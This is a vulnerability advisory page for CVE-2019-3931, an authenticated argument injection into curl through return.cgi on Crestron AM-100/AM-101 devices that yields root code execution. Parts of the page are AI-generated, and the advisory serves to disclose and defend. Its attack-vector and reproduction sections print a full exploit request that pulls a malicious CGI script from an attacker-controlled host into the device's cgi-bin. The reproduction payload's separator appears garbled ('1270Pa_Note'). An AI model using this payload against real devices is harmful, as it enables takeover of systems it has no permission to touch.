VYPR
← All advisories
Unrated severityNVD Advisory· Published Apr 30, 2019· Updated Aug 4, 2024

CVE-2019-3931

CVE-2019-3931

Description

Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 are vulnerable to argumention injection to the curl binary via crafted HTTP requests to return.cgi. A remote, authenticated attacker can use this vulnerability to upload files to the device and ultimately execute code as root.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

An authenticated command injection in Crestron AM-100 and AM-101 return.cgi allows uploading files and executing arbitrary code as root.

Vulnerability

Crestron AM-100 with firmware 1.6.0.2 and AM-101 with firmware 2.7.0.2 are vulnerable to argument injection into the curl binary through crafted HTTP requests to the return.cgi script. A remote, authenticated attacker can exploit this to upload arbitrary files to the device and execute code with root privileges [1].

Exploitation

An attacker must first authenticate to the web interface of the device. The attacker then sends a specially crafted HTTP request to the return.cgi endpoint that injects extra arguments into the call to the curl binary. The injected arguments allow the attacker to control file upload operations and subsequently achieve code execution [1].

Impact

Successful exploitation enables a remote, authenticated attacker to upload files to the device and execute arbitrary commands as the root user, resulting in full compromise of the device confidentiality, integrity, and availability [1].

Mitigation

The vendor has not released a firmware update addressing this vulnerability as of the publication date. Users should restrict network access to the affected devices and change default credentials to limit the risk of exploitation until a patch is applied [1].

References
  1. OEM Presentation Platform Vulnerabilities

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Crestron/AM-100llm-fuzzy
    Range: = 1.6.0.2
  • Crestron/Crestron AirMediav5
    Range: AM-100 firmware 1.6.0.2 and AM-101 firmware 2.7.0.2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Insufficient sanitization of user-supplied parameters passed to the curl binary allows argument injection via a semicolon separator in the upload address field."

Attack vector

An authenticated attacker sends a crafted HTTP POST request to `/cgi-bin/return.cgi` with a `command` XML payload containing an `upload` element [ref_id=1]. The `address` field in the payload includes a semicolon (`;`) followed by arbitrary `curl` arguments, such as `-o` to specify an output path [ref_id=1]. This causes the device to execute `sh /usr/bin/curl -k -o /tmp/Example.ogg http://attacker-ip:port; http://attacker-ip:port/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi`, uploading a malicious CGI script to the writable cgi-bin directory [ref_id=1]. The attacker can then trigger the uploaded script to achieve remote code execution as root [ref_id=1].

Affected code

The vulnerability resides in the `/home/boa/cgi-bin/return.cgi` CGI script on Crestron AM-100 (firmware 1.6.0.2) and AM-101 (firmware 2.7.0.2) [ref_id=1]. The script passes attacker-controlled parameters to the `curl` binary without sufficient sanitization [ref_id=1]. The `/home/boa/cgi-bin/` directory is writable, enabling file overwrite [ref_id=1].

What the fix does

The advisory does not include a patch diff or describe the specific fix applied [ref_id=1]. It notes that a prior patch (for CVE-2017-16709) attempted to filter OS commands but failed to block arbitrary parameters to `curl` [ref_id=1]. The recommended remediation would require properly sanitizing or whitelisting the parameters passed to `curl` in the `return.cgi` script, preventing argument injection via the `address` field [ref_id=1]. No updated firmware version is identified as fixing this specific CVE in the advisory [ref_id=1].

Preconditions

  • authAttacker must have valid authentication credentials for the device's web interface
  • networkAttacker must have network access to the device's HTTPS management interface (typically port 443)
  • networkAttacker must host a server reachable by the device to serve the malicious CGI file

Reproduction

Send a crafted POST request to `/cgi-bin/return.cgi` with the following payload (replace IP addresses and session ID as appropriate):

``` curl --header "Content-Type: application/x-www-form-urlencoded" \ --request POST \ --data "command=<Send><seid>fAEI0CHTDTHKcDVD</seid><upload><protocol>ftp</protocol><address>http://192.168.88.248:1270Pa_Note http://192.168.88.248:1270/lol.cgi -o /home/boa/cgi-bin/file_transfer.cgi</address><port>1270</port><account>lol</account><password>lol</password><logo>/tmp/wat</logo></upload></Send>" \ --insecure https://192.168.88.250/cgi-bin/return.cgi ```

This causes the device to execute `curl` with injected arguments, downloading `lol.cgi` from the attacker's server and writing it to `/home/boa/cgi-bin/file_transfer.cgi` [ref_id=1].

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

0

No linked articles in our index yet.